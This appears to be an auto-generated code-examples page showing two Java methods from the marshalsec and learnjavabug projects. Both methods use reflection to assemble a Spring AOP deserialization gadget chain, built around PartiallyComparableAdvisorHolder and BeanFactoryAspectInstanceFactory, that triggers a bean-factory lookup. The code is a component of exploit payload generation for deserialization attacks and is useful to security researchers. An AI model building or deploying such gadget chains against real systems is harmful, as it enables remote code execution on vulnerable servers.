org.springframework.aop.aspectj.AspectInstanceFactory Java Examples

The following examples show how to use org.springframework.aop.aspectj.AspectInstanceFactory. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example #1
Source File: SpringUtil.java    From marshalsec with MIT License 6 votes vote down vote up
/**
 * @param jndiUrl
 * @param bf
 * @return
 * @throws ClassNotFoundException
 * @throws NoSuchMethodException
 * @throws InstantiationException
 * @throws IllegalAccessException
 * @throws InvocationTargetException
 * @throws Exception
 */
public static Object makeBeanFactoryTriggerPCAH ( UtilFactory uf, String name, BeanFactory bf ) throws ClassNotFoundException,
        NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, Exception {
    AspectInstanceFactory aif = Reflections.createWithoutConstructor(BeanFactoryAspectInstanceFactory.class);
    Reflections.setFieldValue(aif, "beanFactory", bf);
    Reflections.setFieldValue(aif, "name", name);
    AbstractAspectJAdvice advice = Reflections.createWithoutConstructor(AspectJAroundAdvice.class);
    Reflections.setFieldValue(advice, "aspectInstanceFactory", aif);

    // make readObject happy if it is called
    Reflections.setFieldValue(advice, "declaringClass", Object.class);
    Reflections.setFieldValue(advice, "methodName", "toString");
    Reflections.setFieldValue(advice, "parameterTypes", new Class[0]);

    AspectJPointcutAdvisor advisor = Reflections.createWithoutConstructor(AspectJPointcutAdvisor.class);
    Reflections.setFieldValue(advisor, "advice", advice);

    Class<?> pcahCl = Class
            .forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder");
    Object pcah = Reflections.createWithoutConstructor(pcahCl);
    Reflections.setFieldValue(pcah, "advisor", advisor);
    return uf.makeToStringTriggerUnstable(pcah);
}
 
Example #2
Source File: SpringUtil.java    From learnjavabug with MIT License 5 votes vote down vote up
/**
 *
 */
public static Object makeBeanFactoryTriggerPCAH(String name, BeanFactory bf)
    throws ClassNotFoundException,
    NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, Exception {
  AspectInstanceFactory aif = Reflections.createWithoutConstructor(
      BeanFactoryAspectInstanceFactory.class);
  Reflections.setFieldValue(aif, "beanFactory", bf);
  Reflections.setFieldValue(aif, "name", name);
  AbstractAspectJAdvice advice = Reflections.createWithoutConstructor(AspectJAroundAdvice.class);
  Reflections.setFieldValue(advice, "aspectInstanceFactory", aif);

  // make readObject happy if it is called
  Reflections.setFieldValue(advice, "declaringClass", Object.class);
  Reflections.setFieldValue(advice, "methodName", "toString");
  Reflections.setFieldValue(advice, "parameterTypes", new Class[0]);

  AspectJPointcutAdvisor advisor = Reflections.createWithoutConstructor(
      AspectJPointcutAdvisor.class);
  Reflections.setFieldValue(advisor, "advice", advice);

  Class<?> pcahCl = Class
      .forName(
          "org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder");
  Object pcah = Reflections.createWithoutConstructor(pcahCl);
  Reflections.setFieldValue(pcah, "advisor", advisor);
  return ToStringUtil.makeSpringAOPToStringTrigger(pcah);
}